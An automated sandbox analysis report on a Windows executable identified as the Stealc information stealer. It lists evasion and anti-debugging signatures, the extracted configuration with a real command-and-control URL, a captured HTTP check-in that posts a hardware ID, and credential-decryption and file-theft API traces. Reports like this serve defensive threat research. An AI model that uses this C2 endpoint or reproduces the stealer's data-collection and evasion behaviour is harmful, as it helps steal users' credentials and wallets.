Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1544173
MD5:ddaa0462b7b18caecc3dac2c4b87dd91
SHA1:356ec8395b16445164e12c0b238f7fd1af7168bf
SHA256:5026b4a52abc821ed17b10cbe59d4ec4c0a8131d1736dfb89d1e568abee5ab27
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 5912 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DDAA0462B7B18CAECC3DAC2C4B87DD91)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2153163203.00000000053C0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 5912JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 5912JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.970000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-28T23:48:09.074209+010020442431Malware Command and Control Activity Detected192.168.2.649711185.215.113.20680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Found malware configuration
                Source: 0.2.file.exe.970000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/6c4adf523b719729.php", "Botnet": "tale"}
                Multi AV Scanner detection for submitted file
                Source: file.exeReversingLabs: Detection: 42%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00989030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00989030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0097A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009772A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_009772A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0097A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0097C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2153163203.00000000053EB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2153163203.00000000053EB000.00000004.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009840F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_009840F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0097E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0097F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009847C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009847C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00971710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00971710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0097DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00983B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00983B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00984B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00984B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0097EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0097BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0097DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 34 37 30 33 31 41 44 44 34 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="hwid"B47031ADD41E2643095942------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="build"tale------JECBGCFHCFIDHIDHDGDG--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009762D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_009762D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 34 37 30 33 31 41 44 44 34 31 45 32 36 34 33 30 39 35 39 34 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="hwid"B47031ADD41E2643095942------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="build"tale------JECBGCFHCFIDHIDHDGDG--
                Source: file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2241492320.0000000001869000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2241492320.0000000001869000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php1B
                Source: file.exe, 00000000.00000002.2241492320.0000000001869000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpYB
                Source: file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpt
                Source: file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/=c
                Source: file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/Pc
                Source: file.exe, 00000000.00000002.2241492320.0000000001858000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
                Source: file.exe, 00000000.00000002.2241492320.00000000017FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206k
                Source: file.exe, file.exe, 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2153163203.00000000053EB000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B00980_2_009B0098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CB1980_2_009CB198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA1AF0_2_00DBA1AF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A21380_2_009A2138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA1140_2_00DCA114
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC51020_2_00DC5102
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CEB13B0_2_00CEB13B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B42880_2_009B4288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD92740_2_00DD9274
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DE2580_2_009DE258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009ED39E0_2_009ED39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD13BB0_2_00DD13BB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCF34E0_2_00DCF34E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FB3080_2_009FB308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7A4130_2_00C7A413
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD44360_2_00DD4436
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B45A80_2_009B45A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DD5A80_2_009DD5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099E5440_2_0099E544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009945730_2_00994573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B66C80_2_009B66C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009F96FD0_2_009F96FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EA6480_2_009EA648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E67990_2_009E6799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CD7200_2_009CD720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D0B7000_2_00D0B700
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C98B80_2_009C98B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CB8A80_2_009CB8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DF8D60_2_009DF8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCD8B70_2_00DCD8B7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C48680_2_009C4868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D809A10_2_00D809A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD79620_2_00DD7962
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF692D0_2_00DF692D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC2AA30_2_00CC2AA3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E0B880_2_009E0B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E4BA80_2_009E4BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009D8BD90_2_009D8BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EAC280_2_009EAC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC6C030_2_00DC6C03
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C5DB90_2_009C5DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C4DC80_2_009C4DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DC8D4F0_2_00DC8D4F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009DAD380_2_009DAD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009A1D780_2_009A1D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CBD680_2_009CBD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCBD280_2_00DCBD28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E1EE80_2_009E1EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009B8E780_2_009B8E78
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00974610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: uwjugjop ZLIB complexity 0.9949328516340867
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00989790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00989790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00983970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00983970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\AOX2AIN8.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeReversingLabs: Detection: 42%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2114560 > 1048576
                Source: file.exeStatic PE information: Raw size of uwjugjop is bigger than: 0x100000 < 0x199400
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2153163203.00000000053EB000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2153163203.00000000053EB000.00000004.00001000.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.970000.0.unpack :EW;.rsrc :W;.idata :W; :EW;uwjugjop:EW;radqkvcl:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;uwjugjop:EW;radqkvcl:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00989BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00989BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x2049c5 should be: 0x208bb8
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: uwjugjop
                Source: file.exeStatic PE information: section name: radqkvcl
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099A0DC push eax; retf 0_2_0099A0F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA406F push esi; mov dword ptr [esp], edi0_2_00EA40DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E681F0 push ebx; mov dword ptr [esp], 1EEBF1B6h0_2_00E68212
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E761A4 push 31AFC9DFh; mov dword ptr [esp], ebp0_2_00E761CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E761A4 push eax; mov dword ptr [esp], edx0_2_00E761F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E311A8 push eax; mov dword ptr [esp], ecx0_2_00E31299
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E441AF push eax; mov dword ptr [esp], 5CB1EF80h0_2_00E441E9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E441AF push 5F139409h; mov dword ptr [esp], ecx0_2_00E442B3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E3C1AE push eax; mov dword ptr [esp], edx0_2_00E3C1B2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E211B8 push 558689C1h; mov dword ptr [esp], ecx0_2_00E211CD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA1AF push 270F30DBh; mov dword ptr [esp], esp0_2_00DBA1F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA1AF push ebp; mov dword ptr [esp], eax0_2_00DBA208
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DBA1AF push ebp; mov dword ptr [esp], eax0_2_00DBA2F2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF190 push 6C19ED15h; mov dword ptr [esp], ecx0_2_00EAF1D3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EAF190 push edi; mov dword ptr [esp], 7DE795EFh0_2_00EAF1FB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E64168 push 458E3E5Ch; mov dword ptr [esp], ebp0_2_00E64197
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099A106 push eax; retf 0_2_0099A119
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA3158 push edx; mov dword ptr [esp], ebp0_2_00EA3178
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA3158 push edi; mov dword ptr [esp], 02CB7498h0_2_00EA3194
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DEC118 push 36957DDDh; mov dword ptr [esp], ebx0_2_00DEE555
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA114 push 48DDD739h; mov dword ptr [esp], ebp0_2_00DCA11C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA114 push ebx; mov dword ptr [esp], edx0_2_00DCA12B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA114 push edi; mov dword ptr [esp], 094F7EDFh0_2_00DCA146
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA114 push eax; mov dword ptr [esp], ebx0_2_00DCA151
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA114 push ecx; mov dword ptr [esp], ebp0_2_00DCA1B6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA114 push ebp; mov dword ptr [esp], eax0_2_00DCA1BA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA114 push ecx; mov dword ptr [esp], esi0_2_00DCA234
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA114 push esi; mov dword ptr [esp], 2929A9E6h0_2_00DCA238
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA114 push edx; mov dword ptr [esp], edi0_2_00DCA24E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA114 push 3013E15Fh; mov dword ptr [esp], eax0_2_00DCA268
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCA114 push esi; mov dword ptr [esp], eax0_2_00DCA2DA
                Source: file.exeStatic PE information: section name: uwjugjop entropy: 7.954930904416413

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
